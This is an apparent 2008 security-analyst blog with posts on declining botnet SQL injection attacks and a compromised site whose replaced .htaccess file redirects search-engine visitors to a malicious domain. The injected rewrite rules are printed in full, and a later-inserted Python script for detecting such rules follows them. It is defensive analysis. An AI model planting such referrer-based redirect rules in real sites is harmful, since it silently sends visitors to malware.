Monday, November 10, 2008

Where Have all the Bad Guys Gone???

So I am finally fed up with it. Where have all the bad guys gone? I would like to reach out to all of you and let you know that I am starting to run out of side projects.

Since the beginning of 2008 I have seen a huge increase in automated blind SQL injection attacks on websites. I was watching all of these attacks evolve (more on this to come later) into more and more crafty SQL statements attempting to inject a malicious .js file into the SQL database. From what I have been reading, researchers have all agreed that botnets have been increasing almost exponentially over the last few months and are a huge contributor to these SQL injection attacks. Not only was a large part of my day taken up by testing and consulting on all previous compromises, but also by researching and evolving my pen testing skills to be able to handle the growing workload from this increase in attacks.

Then August came. All of a sudden these attacks have almost come to a halt. My workload has decreased by at least 75% in automated compromises with no apparent warning. At a security conference I attended in September, I was informed that a few of the world's largest botnets have suspended operations to overhaul their entire structure, making them more efficient and more powerful. This has been a direct cause of the decrease in automated SQL injection attacks, but they will resume when activity picks back up within the botnets.

It has been a couple of months now since I have seen the decrease in successful automated SQL injection attacks. If you had asked me, I surely would have guessed that things would be "better than ever" in the botnet community by now, but I have not seen it in the end result.

I am waiting patiently for things to be back up to normal and like always would love any ideas/news/opinions on when this is going to happen.

Friday, November 7, 2008

Search Engine 302 Redirect in .htaccess file.

A couple of months ago I was working with a customer where, whenever you attempted to go to their website via Google or Yahoo, you were redirected to that famous Antivirus XP 2008 software. After playing around a bit in my proxy, I was able to determine that this was a "Referrer" specific problem. If you traveled to the website via the address bar, you were fine; however, if your referrer attribute was set to a major search engine domain such as Google, AOL, Ask, or Yahoo, you were automatically redirected to a malicious page.

After alerting the customer to this issue, I asked him if he could please keep me informed of what was causing it. I contacted him two days later only to hear that his hosting company had taken care of the issue and he had zero details for me regarding the compromise.

For some reason, I really liked this type of compromise. For the most part the website owner could be completely unaware that this was occurring for months. This, to me, is a compromise that does not take full advantage, but somewhat leeches off of you like a tapeworm.

I wanted to see this issue again. So what I did was plug this into our product to attempt to detect any site that was currently redirecting only if the referrer was a site like Google or Yahoo. A month went by before I was able to see this again.

I was able to pick up on another search engine 302 redirect issue on the day that it was exploited. Our product detected it and I verified that it was valid. I was able to contact the customer and provide him with details about the issue, and he was willing to work with me on determining how this was occurring.

Although I did not believe that this was occurring via SQL injection or via any GET/POST request, I still requested the entire week of log files. In reviewing these log files, I did see a couple of RFI attempts, but nothing that looked successful, and from reviewing the .txt page that the RFI was calling, I did not see anything that would lead to a compromise.

I was able to track down the problem and saw that the .htaccess file had been replaced and contained the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]
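The two pieces above, the product check for sites that redirect only when the referrer is a search engine and the replaced .htaccess file itself, suggest a simple offline check a defender can run over recovered .htaccess files. The script below is an added example and is not code from the post or from the McAfee Secure product: it groups each RewriteRule with the RewriteCond chain in front of it and flags rules that key on %{HTTP_REFERER} matching a search engine name and redirect to a host other than the site's own. The sample inputs are constructed (the first is the injected file quoted above, the second is a benign anti-hotlinking rule used as a control); the site host name is an assumed value.

```python
import re
from typing import Dict, List

# Search engine names the injected rules in the post keyed on.
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")

# Constructed sample: the injected .htaccess quoted in the post.
CLOAKING_HTACCESS = """
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]
"""

# Constructed control: a legitimate referrer-conditioned anti-hotlinking
# rule, which must not be flagged.
BENIGN_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteRule \.(jpe?g|png|gif)$ - [F]
"""


def _flags(parts: List[str]) -> List[str]:
    """Return the upper-cased flag list from a trailing [A,B] token, or []."""
    if len(parts) > 3 and parts[3].startswith("["):
        return parts[3].strip("[]").upper().split(",")
    return []


def parse_rules(text: str) -> List[Dict]:
    """Group each RewriteRule with the RewriteCond lines that precede it.

    mod_rewrite applies a RewriteCond chain only to the next RewriteRule,
    so the pending conditions are cleared after every rule.
    """
    rules, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append({"var": parts[1], "pattern": parts[2], "flags": _flags(parts)})
        elif directive == "rewriterule" and len(parts) >= 3:
            rules.append({"conds": pending, "pattern": parts[1],
                          "target": parts[2], "flags": _flags(parts)})
            pending = []
    return rules


def is_search_engine_cloak(rule: Dict, site_host: str) -> bool:
    """True when a rule redirects off-site only for visitors arriving from a search engine."""
    # Positive matches on a search engine name; negated (!) patterns are the
    # shape of ordinary anti-hotlink rules and are ignored.
    hits = [c for c in rule["conds"]
            if c["var"].upper() == "%{HTTP_REFERER}"
            and not c["pattern"].startswith("!")
            and any(se in c["pattern"].lower() for se in SEARCH_ENGINES)]
    if not hits:
        return False
    target = rule["target"]
    # An absolute URL target or an R flag (R, R=301, R=302 ...) means a redirect.
    redirects = target.lower().startswith(("http://", "https://")) or \
        any(f.startswith("R") for f in rule["flags"])
    if not redirects:
        return False
    # Only an off-site destination counts as cloaking.
    m = re.match(r"https?://([^/:]+)", target, re.IGNORECASE)
    return m is not None and m.group(1).lower() != site_host.lower()


def find_cloaking_rules(text: str, site_host: str) -> List[Dict]:
    """Return the rules in an .htaccess body that look like search-engine cloaking."""
    return [r for r in parse_rules(text) if is_search_engine_cloak(r, site_host)]


if __name__ == "__main__":
    # "www.example.com" is an assumed site host for the demonstration.
    for r in find_cloaking_rules(CLOAKING_HTACCESS, "www.example.com"):
        print("referrer cloak ->", r["target"], "conditioned on",
              [c["pattern"] for c in r["conds"]])
```

Run it over every .htaccess under the document root (the check is cheap enough to schedule alongside a file-integrity baseline). It only catches the mod_rewrite variant; the same referrer-conditioned redirect can be done from PHP or from the main server configuration, which is why comparing a fetch with and without a search-engine Referer header, as the post's product check does, is the complementary test.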


So from the review of the website, I am starting to lean toward the idea that there is an issue with the file permissions on the web server.


This site was hosted through a large hosting provider with which I have already had previous issues.

I had a compromised account come to me with an iframe embedded on their website and all of the images deleted from the web server. When looking up the iframe on Google, I saw 20 different domains with the same iframe, all hosted by the same hosting provider. We came to the conclusion that there were probably some serious permission issues on the web server. I had the customer move to a different hosting environment and they have not experienced a compromise since. I am guessing that this site might be experiencing the same type of problem.


If you have any more information on this issue, I would love to know about it. I really enjoy working with these types of compromise because they are few and far between and, to me, seem well thought out in design.

Thursday, November 6, 2008

An Introduction

So I have decided to start working on SEO for my life. I know this sounds a little dumb, but everyone is doing it, and well, I need to capitalize on it also.

My name is James A. Lester and I am a Security Analyst for McAfee's McAfee Secure product.
My current position at McAfee is Senior Level Analyst. The majority of my position is to review compromised websites, determining how the compromise occurred and verifying that the website is further secured against the compromise occurring in the future.

I really enjoy my position as I feel that I am on the front lines of web application security. I feel that I am viewing 0day information in SQL injection, CSRF, XSS, RFI/LFI, etc., etc.

What I am hoping to get out of this blog is to post any information that I am currently seeing coming down the pipe in the security world, and see if anyone else has anything to provide in the discussion.

I will try to remember to update this blog (keyword: try; I don't think I have updated my resume since high school except for adding jobs) with anything that I am working on in the world of security or anything that I feel like.